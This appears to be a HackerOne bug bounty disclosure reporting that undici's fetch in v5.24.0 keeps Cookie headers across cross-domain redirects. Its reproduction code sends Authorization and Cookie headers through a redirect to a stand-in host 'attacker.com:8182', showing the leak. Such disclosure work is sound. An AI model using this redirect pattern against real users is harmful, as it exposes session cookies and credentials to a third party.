Internet Bug Bounty: Cookie headers are not cleared in cross-domain redirect in undici-fetch

2023-11-0715:47:49

ranjit_p

hackerone.com

$405

undici

cross-domain redirect

cookie leak

security advisory

bugbounty

AI Score

6.8

Confidence

Low

EPSS

0.012

Percentile

85.7%

JSON

AFFECTED MODULE

undici v5.24.0

STEP TO REPRODUCE

i read this security advisory https://github.com/nodejs/undici/security/advisories/GHSA-q768-x9m6-m9qp .
It says it properly cleared sensitive headers like cookie,Authorization are cleared during cross domain redirect .
So, i installed undici module and tried to reproduce above

import { request } from 'undici'
const {
  statusCode,
  headers,
  trailers,
  body
} = await request('http://anysite.com/redirect.php?url=http://attacker:8182',{
        maxRedirections: 3,
        headers: {
            autHorization: 'test',
	    cookie: "ddd=dddd"
        }})

console.log('response received', statusCode)
console.log('headers', headers)

for await (const data of body) {
  console.log('data', data)
}

This will properly clear authorization and cookie header during cross-domain redirect .

Now i tried with undici-fetch and it failed to clear cookie header during cross-domain redirect

import { fetch } from 'undici'

const res = await fetch('http://anysite.com/redirect.php?url=http://attacker.com:8182/vvv',{
        maxRedirections: 3,
        headers: {
            AutHorization: 'test',
            Cookie: "ddd=dddd"
        }})
const json = await res.json()
console.log(json)